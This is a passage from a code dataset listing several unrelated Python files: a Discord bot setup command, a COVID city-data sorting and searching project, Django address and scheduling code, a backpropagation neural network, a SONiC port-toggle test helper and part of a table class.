_mongoFunctions.generate_default_settings(ctx.guild.id)\n\n # Checking function to determine if responses are sent by initial user in initial channel\n def check(message):\n return message.author == ctx.author and message.channel == ctx.channel\n\n response_message = await ctx.channel.send(embed = _embedMessage.create(\"Setup Reply\", \"Should Morning Announcements be Enabled (y/n)?\", \"blue\"))\n\n await set_settings(ctx, client, response_message, stop_embed, check)\n\n await ctx.channel.send(embed = _embedMessage.create(\"Setup Reply\", \"Announcement Setup has been Completed\", \"blue\"))\n\n\nasync def set_settings(ctx: discord.Message, client: discord.Client, response_message: discord.Message, stop_embed: discord.embeds, check):\n while True:\n await response_message.edit(embed = _embedMessage.create(\"Setup Reply\", \"Should Morning Announcements be Enabled (y/n)?\", \"blue\"))\n try:\n morning_announcements_message = await client.wait_for('message', timeout = wait_timeout, check = check)\n except asyncio.TimeoutError:\n await response_message.edit(embed = _embedMessage.create(\"Setup Reply\", \"You took too long to respond.\", \"red\"))\n return\n else:\n morning_announcements_string = morning_announcements_message.content.lower()\n if morning_announcements_string == 'next':\n break\n if morning_announcements_string == 'stop':\n await ctx.channel.send(embed = stop_embed)\n return\n if morning_announcements_string in ('yes', 'y', 'true', 't', '1', 'enable', 'on'):\n _mongoFunctions.update_setting(ctx.guild.id, \"morning_announcements_enabled\", True)\n else:\n _mongoFunctions.update_setting(ctx.guild.id, \"morning_announcements_enabled\", False)\n\n break\n\n await asyncio.sleep(0.5)\n\n if _mongoFunctions.get_settings(ctx.guild.id)[\"morning_announcements_enabled\"]:\n while True:\n await response_message.edit(embed = _embedMessage.create(\"Setup Reply\", \"What is the morning announcement channel?\", \"blue\"))\n try:\n announcement_channel_message = await client.wait_for('message', timeout = wait_timeout, check = check)\n except asyncio.TimeoutError:\n await response_message.edit(embed = _embedMessage.create(\"Setup Reply\", \"You took too long to respond.\", \"red\"))\n return\n else:\n announcement_channel_string = announcement_channel_message.content\n if announcement_channel_string.lower() == 'next':\n break\n if announcement_channel_string.lower() == 'stop':\n await ctx.channel.send(embed = stop_embed)\n return\n announcement_channel_id = discord.utils.get(ctx.guild.channels, mention = announcement_channel_string).id\n 
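# discord.utils.get() returns None when no channel matches the mention, so the .id access above raises AttributeError for an unknown channel.\n 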
_mongoFunctions.update_setting(ctx.guild.id, \"announcement_channel_id\", announcement_channel_id)\n break\n\n while True:\n await response_message.edit(embed = _embedMessage.create(\"Setup Reply\", \"What is the morning announcement time (HH:MM)?\", \"blue\"))\n try:\n announcement_time_message = await client.wait_for('message', timeout = wait_timeout, check = check)\n except asyncio.TimeoutError:\n await response_message.edit(embed = _embedMessage.create(\"Setup Reply\", \"You took too long to respond.\", \"red\"))\n return\n else:\n announcement_time_string = announcement_time_message.content\n if announcement_time_string.lower() == 'next':\n break\n if announcement_time_string.lower() == 'stop':\n await ctx.channel.send(embed = stop_embed)\n return\n _mongoFunctions.update_setting(ctx.guild.id, \"announcement_time\", announcement_time_string)\n break\n\n while True:\n await response_message.edit(embed = _embedMessage.create(\"Setup Reply\", \"Should the quote be random (y/n)?\", \"blue\"))\n try:\n random_quote_message = await client.wait_for('message', timeout = wait_timeout, check = check)\n except asyncio.TimeoutError:\n await response_message.edit(embed = _embedMessage.create(\"Setup Reply\", \"You took too long to respond.\", \"red\"))\n return\n else:\n random_quote_string = random_quote_message.content.lower()\n if random_quote_string == 'next':\n break\n if random_quote_string == 'stop':\n await ctx.channel.send(embed = stop_embed)\n return\n if random_quote_string in ('yes', 'y', 'true', 't', '1', 'enable', 'on'):\n _mongoFunctions.update_setting(ctx.guild.id, \"random_quote\", True)\n else:\n _mongoFunctions.update_setting(ctx.guild.id, \"random_quote\", False)\n break\n\n while True:\n await response_message.edit(embed = _embedMessage.create(\"Setup Reply\", \"Who should be quoted in the morning announcement?\", \"blue\"))\n try:\n announcement_quoted_person_message = await client.wait_for('message', timeout = wait_timeout, check = check)\n except asyncio.TimeoutError:\n await response_message.edit(embed = _embedMessage.create(\"Setup Reply\", \"You took too long to respond.\", \"red\"))\n return\n else:\n announcement_quoted_person = announcement_quoted_person_message.content\n if announcement_quoted_person.lower() == 'next':\n break\n if announcement_quoted_person.lower() == 'stop':\n await ctx.channel.send(embed = stop_embed)\n return\n _mongoFunctions.update_setting(ctx.guild.id, \"announcement_quoted_person\", announcement_quoted_person)\n break\n","sub_path":"commands/setupannouncement.py","file_name":"setupannouncement.py","file_ext":"py","file_size_in_byte":6815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"144497350","text":"# Author: Luke LaCasse\n# Date: October 1, 2020\n# Title: ECE 241 Project 1: Sorting and Searching\n# Description:\n\nfrom BinarySearchTree import *\n#from time import time_ns\n#from random import randint\n\nclass City:\n\n def __init__(self, cid, cname, cstate, pop, cities):\n self.cid = cid\n self.cname = cname\n self.cstate = cstate\n self.pop = pop\n self.cities = cities\n\n def __str__(self):\n return (\"cid: %s; cname: %s; cstate: %s; cases:%s\" % (self. 
cid, self.cname, self.cstate, self.cities)).rstrip(\"\\n\")\n\n\nclass COV19Library:\n\n def __init__(self):\n self.cityArray = []\n self.size = 0\n self.isSorted = False\n self.BST = None\n self.root = None\n\n def LoadData(self, filename):\n file = open(filename, \"r\") # open csv file as read-only\n file.readline() # skip first line\n while True:\n cindex = [] # keeps track of comma indexes per line\n index = 0\n line = file.readline() # read line of the input file\n for char in line: # sort through the line character by character\n if char == ',': cindex.append(index) # add index to location to cindex if ',' is found\n index += 1\n if len(cindex) == 0: break\n citsta = str.split(line[cindex[0] + 1 : cindex[1]]) # splits city and state field by space into array of string\n stindex = len(citsta) - 1 # index of state name\n stateName = citsta[stindex] # Store state name\n if len(citsta) == 1: # Deals with cities with no state name\n citName = citsta[0]\n else:\n citName = line[cindex[0] + 1: cindex[1] - (len(stateName) + 1)] # Format City Name\n dlen = len(line) - len(line[cindex[3] + 1: cindex[len(cindex) - 1]]) # how many characters are left after the last comma\n temp = City(line[0:cindex[0]], citName, stateName, line[cindex[2] + 1: cindex[3]], line[cindex[len(cindex) - 1] + 1 : cindex[len(cindex) - 1] + dlen]) # line[cindex[3] + 1: cindex[len(cindex) - 1] + dlen])\n self.cityArray.append(temp)\n self.size = len(self.cityArray)\n\n def linearSearch(self, city, attribute):\n for tempcity in self.cityArray:\n if attribute == \"id\":\n if tempcity.cid == city:\n return str(tempcity)\n elif attribute == \"name\":\n if tempcity.cname == city:\n return str(tempcity)\n return \"City not found\"\n\n def quickSort(self):\n self.quickSortHelper(0,len(self.cityArray) - 1)\n self.isSorted = True\n\n def quickSortHelper(self, first, last):\n if first < last:\n splitpoint = self.partition(first, last)\n\n self.quickSortHelper(first, splitpoint - 1)\n self.quickSortHelper(splitpoint + 1, last)\n\n def partition(self, first, last):\n pivotvalue = self.cityArray[first].cname\n\n leftmark = first + 1\n rightmark = last\n\n done = False\n while not done:\n\n while leftmark <= rightmark and self.cityArray[leftmark].cname <= pivotvalue:\n leftmark = leftmark + 1\n\n while self.cityArray[rightmark].cname >= pivotvalue and rightmark >= leftmark:\n rightmark = rightmark - 1\n\n if rightmark < leftmark:\n done = True\n else:\n temp = self.cityArray[leftmark]\n self.cityArray[leftmark] = self.cityArray[rightmark]\n self.cityArray[rightmark] = temp\n\n temp = self.cityArray[first]\n self.cityArray[first] = self.cityArray[rightmark]\n self.cityArray[rightmark] = temp\n\n return rightmark\n\n def buildBST(self):\n if not self.isSorted:\n self.BST = AVLTree()\n for city in self.cityArray:\n self.BST.put(int(city.cid), city)\n self.root = self.BST.root\n\n\n\n def searchBST(self, cid):\n try:\n temp = self.BST.get(int(cid))\n if temp is not None:\n return temp\n else:\n return \"City not found\"\n except:\n return \"City not found\"\n\n# Press the green button in the gutter to run the script.\nif __name__ == '__main__':\n lib = COV19Library()\n lib.LoadData(\"cov19_city.csv\")\n lib.linearSearch(\"23700\",\"id\")\n lib.linearSearch(\"Lafayette\",\"name\")\n lib.linearSearch(\"Beebo\",\"name\")\n #lib.quickSort()\n\n'''\n #Find city with largest population\n maxPop = None\n for city in lib.cityArray:\n if maxPop is None or int(city.pop) > int(maxPop.pop):\n maxPop = city\n print(maxPop)\n\n # Test average execution 
of building the Binary Search Tree\n totalTime = 0\n iterations = 10\n for i in range(0, iterations):\n lib.BST = None # reset BST\n start = time_ns()\n lib.buildBST()\n end = time_ns()\n totalTime = totalTime + (end - start)\n avgTime = (totalTime / iterations) * (1e-9)\n print(\"Average time to build BST, iterations = %s: %s [Seconds]\" % (iterations, avgTime))\n\n # Generate list of randomly selected CIDs\n randCID = list()\n lib.BST = None\n lib.buildBST()\n numCity = 100\n for i in range(0,numCity):\n rand = randint(0, lib.size) # Generates random 6-Digit Number\n randCID.append(lib.cityArray[rand].cid)\n\n # Test average execution time of a linear search\n totalTime = 0\n iterations = 10\n for i in range(0, iterations):\n start = time_ns()\n for j in range(0, len(randCID) - 1):\n lib.linearSearch(randCID[j], \"id\")\n end = time_ns()\n totalTime = totalTime + (end - start)\n avgTime = (totalTime / iterations) * (1e-9)\n print(\"Average time to linearSearch through %s random CIDs, iterations = %s: %s [Seconds]\" % (numCity, iterations, avgTime))\n\n # Test average execution time of a linear search\n totalTime = 0\n iterations = 10\n for i in range(0, iterations):\n start = time_ns()\n for j in range(0, len(randCID) - 1):\n lib.searchBST(randCID[j])\n end = time_ns()\n totalTime = totalTime + (end - start)\n avgTime = (totalTime / iterations) * (1e-9)\n print(\"Average time to searchBST %s random CIDs, iterations = %s: %s [Seconds]\" % (numCity, iterations, avgTime))\n'''","sub_path":"project1.py","file_name":"project1.py","file_ext":"py","file_size_in_byte":6394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"413957969","text":"# -*- coding: utf-8 -*-\n\"\"\"地址应用模块\n\n该模块用于从数据库取出地址树并作为数据源提供给前台。\n\"\"\"\n#address.py\n#\n#Copyright (C) 2017 YINSHO(Shanghai) SoftWare Technology Co., Ltd.\n#All rights reserved\n#\n__author__ = \"lifeijie \"\n\nimport json\n\nfrom django.http import JsonResponse\nfrom django.shortcuts import render\nfrom django.views.decorators.csrf import ensure_csrf_cookie\n\nfrom .common import get_openid, user_register_check\nfrom ..config import APP_NAME\nfrom ..global_var import logger\nfrom ..socket_client import send2serv\n\n\ndef get_region_json(request):\n \"\"\"视图函数,返回json地址树\"\"\"\n start_node_name = request.POST.get('name')\n end_level = request.POST.get('level')\n kargs = {\n 'start_node_name': start_node_name,\n 'end_level': end_level,\n }\n context = send2serv({'path': 'address.get_region_json', 'kargs': kargs})\n return JsonResponse(context)\n\n\n@ensure_csrf_cookie\n@user_register_check\ndef modify_page(request):\n \"\"\"视图函数,返回初始化地址修改页面\"\"\"\n from_page = request.GET.get('from')\n logger.debug('FROM: %s', from_page)\n openid = request.session.get('openid')\n kargs = {\n 'from_page': from_page,\n 'openid': openid,\n 'start_node_code': '330000000000',\n 'end_level': 'county',\n }\n context = send2serv({'path': 'address.modify_page', 'kargs': kargs})\n return render(request, APP_NAME + '/address_modify.html', context)\n\n\ndef modify(request):\n \"\"\"视图函数,根据请求修改用户/商户地址\"\"\"\n logger.debug('POST: %s', request.POST)\n from_page = request.POST.get('from')\n openid = request.session.get('openid')\n id = request.POST.get('id')\n #地址解析\n address = {}\n address_pcc = request.POST.get('addressPcc')\n province = address_pcc.split(' ')[0]\n city = address_pcc.split(' ')[1]\n county = address_pcc.split(' ')[2]\n address_tv = request.POST.get('addressTv')\n town = address_tv.split(' ')[0]\n town = town if town 
!= '不选择' else None\n village = address_tv.split(' ')[1]\n village = village if village != '不选择' else None\n address_detail = request.POST.get('addressDetail')\n kargs = {\n 'from_page': from_page,\n 'openid': openid,\n 'id': id,\n 'province': province,\n 'city': city,\n 'county': county,\n 'town': town,\n 'village': village,\n 'address_detail': address_detail,\n }\n context = send2serv({'path': 'address.modify', 'kargs': kargs})\n return JsonResponse(context)\n","sub_path":"weixin_outer/outer_app/views/address.py","file_name":"address.py","file_ext":"py","file_size_in_byte":2597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"242891375","text":"# -*- coding: utf-8 -*-\nfrom django.db import models\nimport datetime\nfrom django.utils.translation import ugettext_lazy as _\nfrom users.models import User\nfrom django.conf import settings\n\n\nclass Schedule(models.Model):\n\n YEAR_CHOICES = []\n for r in range(2016, (datetime.datetime.now().year + 1)):\n YEAR_CHOICES.append((r, r))\n\n MONTH_CHOICES = (\n (1, _('Jan')),\n (2, _('Feb')),\n (3, _('Mar')),\n (4, _('April')),\n (5, _('May')),\n (6, _('Jun')),\n (7, _('Jul')),\n (8, _('Aug')),\n (9, _('Sep')),\n (10, _('Oct')),\n (11, _('Nov')),\n (12, _('Dec')),\n )\n\n DAY_WEEK_CHOICES = (\n (0, _('monday')),\n (1, _('tuesday')),\n (2, _('wednesday')),\n (3, _('thursday')),\n (4, _('friday')),\n (5, _('saturday')),\n (6, _('sunday')),\n )\n\n user = models.ForeignKey(User, verbose_name=_('doctor'))\n year = models.IntegerField(_('year'), choices=YEAR_CHOICES, default=datetime.datetime.now().year)\n month = models.IntegerField(_('month'), choices=MONTH_CHOICES, default=datetime.datetime.now().month)\n day_week = models.IntegerField(_('day week'), choices=DAY_WEEK_CHOICES)\n start_time = models.TimeField(_('start time'), default=datetime.time(settings.WORK_TIME_START))\n end_time = models.TimeField(_('end time'), default=datetime.time(settings.WORK_TIME_END), blank=True)\n\n class Meta:\n db_table = 'schedule'\n verbose_name = _('schedule')\n verbose_name_plural = _('schedules')\n unique_together = ('user', 'year', 'month', 'day_week')\n\n def __str__(self):\n return '{day} [{year}.{month}]'.format(day=self.get_day_week_display(), year=self.year, month=self.month)\n\n\nclass Reception(models.Model):\n patient = models.CharField(_('patient'), max_length=50)\n doctor = models.ForeignKey(User, verbose_name=_('doctor'))\n date = models.DateField(_('date'))\n start_time = models.TimeField(_('start time'))\n end_time = models.TimeField(_('end time'))\n\n class Meta:\n db_table = 'reception'\n verbose_name = _('reception')\n verbose_name_plural = _('receptions')\n unique_together = ('doctor', 'date', 'start_time',)\n\n def __str__(self):\n return '{patient} {date}({start_time}-{end_time})[{doctor}]'.format(\n patient=self.patient,\n date=self.date,\n start_time=self.start_time,\n end_time=self.end_time,\n doctor=self.doctor\n )\n\n def save(self, *args, **kwargs):\n if self.start_time:\n delta = datetime.timedelta(hours=settings.RECEPTION_TIME)\n self.end_time = (datetime.datetime.combine(datetime.date(1, 1, 1), self.start_time) + delta).time()\n\n super(Reception, self).save(*args, **kwargs)\n","sub_path":"src/apps/schedules/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2823,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"166376506","text":"def stringCompression(word):\n # Time: O(n)\n letterCount = 1\n output = ''\n 
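# Example: \"aaaabbbbccccddddddddd\" -> \"a4b4c4d9\"; an empty input would raise IndexError at the final word[-1] append below.\n 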
for i in range(len(word)-1):\n if word[i]==word[i+1]:\n letterCount+=1\n else:\n output+=word[i]+ str(letterCount)\n letterCount = 1\n output+=word[-1]+str(letterCount)\n return output\n\nprint(stringCompression(\"aaaabbbbccccddddddddd\"))\n\n","sub_path":"1 - Arrays and Strings/1-6-stringComression.py","file_name":"1-6-stringComression.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"476536973","text":"#!/usr/bin/env python3\nimport numpy as np\nfrom io import StringIO\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\nNUM_FEATURES = 124 #features are 1 through 123 (123 only in test set), +1 for the bias\nDATA_PATH = \"/u/cs246/data/adult/\" #TODO: if doing development somewhere other than the cycle server, change this to the directory where a7a.train, a7a.dev, and a7a.test are\n#DATA_PATH = \"/Users/Robert/Desktop/ML/adult/\"\n\n#returns the label and feature value vector for one datapoint (represented as a line (string) from the data file)\ndef parse_line(line):\n tokens = line.split()\n x = np.zeros(NUM_FEATURES)\n y = int(tokens[0])\n y = max(y,0) #treat -1 as 0 instead, because sigmoid's range is 0-1\n for t in tokens[1:]:\n parts = t.split(':')\n feature = int(parts[0])\n value = int(parts[1])\n x[feature-1] = value\n x[-1] = 1 #bias\n return y, x\n\n#return labels and feature vectors for all datapoints in the given file\ndef parse_data(filename):\n with open(filename, 'r') as f:\n vals = [parse_line(line) for line in f]\n (ys, xs) = ([v[0] for v in vals],[v[1] for v in vals])\n return np.asarray([ys],dtype=np.float32).T, np.asarray(xs,dtype=np.float32) #returns a tuple, first is an array of labels, second is an array of feature vectors\n\ndef init_model(args):\n w1 = None\n w2 = None\n\n if args.weights_files:\n with open(args.weights_files[0], 'r') as f1:\n w1 = np.loadtxt(f1)\n with open(args.weights_files[1], 'r') as f2:\n w2 = np.loadtxt(f2)\n w2 = w2.reshape(1,len(w2))\n else:\n #TODO (optional): If you want, you can experiment with a different random initialization. As-is, each weight is uniformly sampled from [-0.5,0.5).\n w1 = np.random.rand(args.hidden_dim, NUM_FEATURES) #bias included in NUM_FEATURES\n w2 = np.random.rand(1, args.hidden_dim + 1) #add bias column\n\n #At this point, w1 has shape (hidden_dim, NUM_FEATURES) and w2 has shape (1, hidden_dim + 1). 
In both, the last column is the bias weights.\n\n\n #TODO: Replace this with whatever you want to use to represent the network; you could use use a tuple of (w1,w2), make a class, etc.\n model = (w1, w2)\n return model\n\ndef loss_func(y, y_hat):\n return 1/2 * np.sum(np.square(y - y_hat))\n\ndef sigmoid(a):\n return 1.0/(1.0+np.exp(-a))\n\ndef dsigmoid(a):\n return sigmoid(a)*(1-sigmoid(a))\n # return z*(1-z)\n\ndef forward(model, input):\n # input-hidden\n w1, w2 = extract_weights(model)\n a1 = np.dot(w1, input)\n # print(input.shape)\n try:\n z1 = sigmoid(a1).reshape(a1.shape[0], 1)\n except:\n z1 = sigmoid(a1) \n bias = np.ones((1, z1.shape[1]))\n z1_biased = np.concatenate((z1, bias), axis = 0)\n\n # hidden-output\n a2 = np.dot(w2, z1_biased)\n z2 = sigmoid(a2)\n\n d = {\"a1\" : a1, \"z1\" : z1, \"z1_biased\" : z1_biased, \"a2\" : a2, \"z2\" : z2}\n\n return z2, d\n\n\ndef train_model(model, train_ys, train_xs, dev_ys, dev_xs, args):\n #TODO: Implement training for the given model, respecting args\n model = init_model(args)\n w1, w2 = model\n model_o = model\n acc_train, acc_dev = list(),list()\n best_iter, best_hid = 0,0\n max_acc = 0\n \n # plot and experiments\n f, axarr = plt.subplots(2, sharex=True)\n lr_arr = [0.001, 0.005, 0.01, 0.05, 0.1, 1]\n\n for l in range(len(lr_arr)):\n acc_train = list()\n acc_dev = list()\n best_iter = 0\n model_o = init_model(args)\n model = model_o\n w1, w2 = model\n for i in range(args.iterations):\n for n in range(train_ys.shape[0]): \n x_vector = train_xs[n].reshape(train_xs[n].shape[0], 1)\n\n # forward\n y_hat, dic = forward(model, x_vector)\n loss = loss_func(x_vector, y_hat)\n\n # backward\n delta2 = (y_hat-train_ys[n]) * dsigmoid(dic[\"a2\"])\n #print(delta2.shape)\n dweight2 = np.dot(delta2, dic[\"z1_biased\"].T)\n w2_reduced = w2[:, 0:w2.shape[1]-1]\n delta1 = delta2 * (w2_reduced.T * dsigmoid(dic[\"a1\"]))\n\n dweight1 = np.dot(delta1, x_vector.T)\n \n w2 = w2 - lr_arr[l] * dweight2\n w1 = w1 - lr_arr[l] * dweight1\n model = (w1, w2)\n\n if not args.nodev:\n acc_train.append(test_accuracy(model, train_ys, train_xs))\n acc_dev.append(test_accuracy(model, dev_ys, dev_xs))\n if i == 0:\n max_acc = test_accuracy(model, dev_ys, dev_xs)\n best_iter = 0\n model_o = w1, w2\n elif (i > 0) and (acc_dev[i] > max_acc):\n best_iter = i\n model_o = w1, w2\n max_acc = acc_dev[i]\n\n if not args.nodev:\n x = range(1, args.iterations+1)\n sns.set()\n pal = sns.color_palette(\"Set2\", 6)\n axarr[0].plot(x, acc_train, c=pal[l], label='lr={}'.format(lr_arr[l]), linewidth=1)\n axarr[0].legend(loc='lower right')\n axarr[0].set_ylim(0.2,1)\n axarr[0].set_title('Training')\n\n axarr[1].plot(x, acc_dev, c=pal[l], label='lr={}'.format(lr_arr[l]), linewidth=1)\n axarr[1].legend(loc='lower right')\n axarr[1].set_ylim(0.2,1)\n axarr[1].set_title('Dev')\n print('Best number of iterations at learning rate = %s, hidden layer dimension = %s is %s' % (lr_arr[l], args.hidden_dim, best_iter+1))\n print('Accuracy: {}'.format(acc_dev[best_iter]))\n\n plt.show()\n\n if not args.nodev:\n return model_o\n\n return model\n\ndef test_accuracy(model, test_ys, test_xs):\n y_hat = forward(model, test_xs.T)[0]\n return np.sum((test_ys.T >= 0.5) == (y_hat >= 0.5)) / test_xs.shape[0]\n\n\ndef extract_weights(model):\n w1 = model[0]\n w2 = model[1]\n #TODO: Extract the two weight matrices from the model and return them (they should be the same type and shape as they were in init_model, but now they have been updated during training)\n return w1, w2\n\ndef main():\n import argparse\n 
import os\n\n parser = argparse.ArgumentParser(description='Neural network with one hidden layer, trainable with backpropagation.')\n parser.add_argument('--nodev', action='store_true', default=False, help='If provided, no dev data will be used.')\n parser.add_argument('--iterations', type=int, default=5, help='Number of iterations through the full training data to perform.')\n parser.add_argument('--lr', type=float, default=0.1, help='Learning rate to use for update in training loop.')\n\n weights_group = parser.add_mutually_exclusive_group()\n weights_group.add_argument('--weights_files', nargs=2, metavar=('W1','W2'), type=str, help='Files to read weights from (in format produced by numpy.savetxt). First is weights from input to hidden layer, second is from hidden to output.')\n weights_group.add_argument('--hidden_dim', type=int, default=5, help='Dimension of hidden layer.')\n\n parser.add_argument('--print_weights', action='store_true', default=False, help='If provided, print final learned weights to stdout (used in autograding)')\n\n parser.add_argument('--train_file', type=str, default=os.path.join(DATA_PATH,'a7a.train'), help='Training data file.')\n parser.add_argument('--dev_file', type=str, default=os.path.join(DATA_PATH,'a7a.dev'), help='Dev data file.')\n parser.add_argument('--test_file', type=str, default=os.path.join(DATA_PATH,'a7a.test'), help='Test data file.')\n\n\n args = parser.parse_args()\n\n \"\"\"\n At this point, args has the following fields:\n\n args.nodev: boolean; if True, you should not use dev data; if False, you can (and should) use dev data.\n args.iterations: int; number of iterations through the training data.\n args.lr: float; learning rate to use for training update.\n args.weights_files: iterable of str; if present, contains two fields, the first is the file to read the first layer's weights from, second is for the second weight matrix.\n args.hidden_dim: int; number of hidden layer units. 
If weights_files is provided, this argument should be ignored.\n args.train_file: str; file to load training data from.\n args.dev_file: str; file to load dev data from.\n args.test_file: str; file to load test data from.\n \"\"\"\n train_ys, train_xs = parse_data(args.train_file)\n dev_ys = None\n dev_xs = None\n if not args.nodev:\n dev_ys, dev_xs= parse_data(args.dev_file)\n test_ys, test_xs = parse_data(args.test_file)\n\n model = init_model(args)\n model = train_model(model, train_ys, train_xs, dev_ys, dev_xs, args)\n accuracy = test_accuracy(model, test_ys, test_xs)\n print('Test accuracy: {}'.format(accuracy))\n if args.print_weights:\n w1, w2 = extract_weights(model)\n with StringIO() as weights_string_1:\n np.savetxt(weights_string_1,w1)\n print('Hidden layer weights: {}'.format(weights_string_1.getvalue()))\n with StringIO() as weights_string_2:\n np.savetxt(weights_string_2,w2)\n print('Output layer weights: {}'.format(weights_string_2.getvalue()))\n\n\nif __name__ == '__main__':\n main()\n\n\n\n","sub_path":"HW3/backprop_files/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":9286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"120520332","text":"\"\"\"\nTool used for shutdown/startup port on the DUT.\n\"\"\"\n\nimport datetime\nimport time\nimport logging\nimport pprint\n\nfrom tests.common.helpers.assertions import pytest_assert\n\nlogger = logging.getLogger(__name__)\n\n\ndef port_toggle(duthost, tbinfo, ports=None, wait=60, wait_after_ports_up=60, watch=False):\n \"\"\"\n Toggle ports on DUT.\n\n Args:\n duthost: DUT host object\n ports: Specify list of ports, None if toggle all ports\n wait: Time to wait for interface to become up\n wait_after_ports_up: Time to wait after interfaces become up\n watch: Logging system state\n \"\"\"\n\n def __get_down_ports():\n \"\"\"Check interface status and return the down ports in a set\n \"\"\"\n total_down_ports = set()\n ports_down = duthost.interface_facts(up_ports=ports)['ansible_facts']['ansible_interface_link_down_ports']\n db_ports_down = duthost.show_interface(command='status', up_ports=ports)['ansible_facts']\\\n ['ansible_interface_link_down_ports']\n total_down_ports.update(ports_down)\n total_down_ports.update(db_ports_down)\n return total_down_ports\n\n if ports is None:\n logger.debug('ports is None, toggling all minigraph ports')\n mg_facts = duthost.get_extended_minigraph_facts(tbinfo)\n ports = mg_facts['minigraph_ports'].keys()\n\n logger.info('toggling ports:\\n%s', pprint.pformat(ports))\n\n cmds_down = []\n cmds_up = []\n for port in ports:\n cmds_down.append('config interface shutdown {}'.format(port))\n cmds_up.append('config interface startup {}'.format(port))\n\n shutdown_ok = False\n shutdown_err_msg = ''\n try:\n duthost.shell_cmds(cmds=cmds_down)\n if watch:\n time.sleep(1)\n\n # Watch memory status\n memory_output = duthost.shell(\"show system-memory\")[\"stdout\"]\n logger.info(\"Memory Status: %s\", memory_output)\n\n # Watch orchagent CPU utilization\n orch_cpu = duthost.shell(\"show processes cpu | grep orchagent | awk '{print $9}'\")[\"stdout\"]\n logger.info(\"Orchagent CPU Util: %s\", orch_cpu)\n\n # Watch Redis Memory\n redis_memory = duthost.shell(\"redis-cli info memory | grep used_memory_human\")[\"stdout\"]\n logger.info(\"Redis Memory: %s\", redis_memory)\n\n logger.info('Wait for ports to become down.')\n start_time = datetime.datetime.now()\n while True:\n down_ports = __get_down_ports()\n if len(down_ports) == 
len(ports):\n shutdown_ok = True\n break\n time.sleep(5)\n if (datetime.datetime.now() - start_time).seconds > 20:\n break\n\n if not shutdown_ok:\n shutdown_err_msg = 'Some ports did not go down as expected: {}'.format(str(set(ports) - set(down_ports)))\n except Exception as e:\n shutdown_err_msg = 'Shutdown ports failed with exception: {}'.format(repr(e))\n\n startup_ok = False\n startup_err_msg = ''\n try:\n duthost.shell_cmds(cmds=cmds_up)\n\n logger.info('Wait for ports to become up.')\n start_time = datetime.datetime.now()\n while True:\n down_ports = __get_down_ports()\n if len(down_ports) == 0:\n startup_ok = True\n break\n time.sleep(5)\n if (datetime.datetime.now() - start_time).seconds > wait:\n break\n\n if not startup_ok:\n startup_err_msg = 'Some ports did not go up as expected: {}'.format(str(down_ports))\n\n except Exception as e:\n startup_err_msg = 'Startup interfaces failed with exception: {}'.format(repr(e))\n\n pytest_assert(shutdown_ok, shutdown_err_msg)\n pytest_assert(startup_ok, startup_err_msg)\n\n logger.info('wait %d seconds for system to startup', wait_after_ports_up)\n time.sleep(wait_after_ports_up)\n","sub_path":"tests/common/port_toggle.py","file_name":"port_toggle.py","file_ext":"py","file_size_in_byte":3898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"587238346","text":"import re\nimport collections\n\nfrom copy import copy\nfrom numbers import Number\nfrom operator import truediv\nfrom itertools import chain, repeat, accumulate\nfrom collections.abc import Container\nfrom typing import Any, Iterable, Dict, List, Tuple, Optional, Sequence, Hashable, Iterator, Union, Type, Callable\n\nfrom coba.config import CobaConfig\nfrom coba.utilities import PackageChecker\nfrom coba.pipes import Filter, Cartesian, JsonEncode, JsonDecode, StopPipe, Pipe, DiskSink, DiskSource\n\nclass Table:\n \"\"\"A container class for storing tabular data.\"\"\"\n\n def __init__(self, name:str, primary_cols: Sequence[str], rows: Sequence[Dict[str,Any]] = []):\n \"\"\"Instantiate a Table.\n \n Args:\n name: The name of the table.\n default: The default values to fill in missing values with\n \"\"\"\n self._name = name\n self._primary = primary_cols\n\n def index_cols():\n for row in rows:\n if '_packed' in row: \n return ['index']\n return []\n \n def data_cols():\n return ( sorted(row.keys() - ['_packed'] | row.get('_packed',{}).keys()) for row in rows)\n\n for row in rows:\n assert len(row.keys() & primary_cols) == len(primary_cols), 'A Table row was provided without a primary key.'\n\n all_columns = list(chain(primary_cols, index_cols(), *data_cols()))\n self._columns = sorted(set(all_columns), key=lambda col: all_columns.index(col))\n\n self._rows_keys: List[Hashable ] = [] \n self._rows_flat: Dict[Hashable, Dict[str,Any]] = {}\n self._rows_pack: Dict[Hashable, Dict[str,Any]] = {}\n\n for row in rows:\n row_key = row[primary_cols[0]] if len(primary_cols) == 1 else tuple(row[col] for col in primary_cols)\n row_pack = row.pop('_packed',{})\n row_flat = row\n\n if row_pack:\n row_pack['index'] = list(range(1,len(list(row_pack.values())[0])+1))\n\n self._rows_keys.append(row_key)\n self._rows_pack[row_key] = row_pack\n self._rows_flat[row_key] = row_flat\n\n self._rows_keys = sorted(self._rows_keys)\n\n @property\n def name(self) -> str:\n return self._name\n\n @property\n def keys(self) -> Sequence[Hashable]:\n return self._rows_keys\n\n @property\n def columns(self) -> Sequence[str]:\n return self._columns\n\n @property\n 
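# Infers one numpy-friendly dtype per column from both the flat and packed row values.\n 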
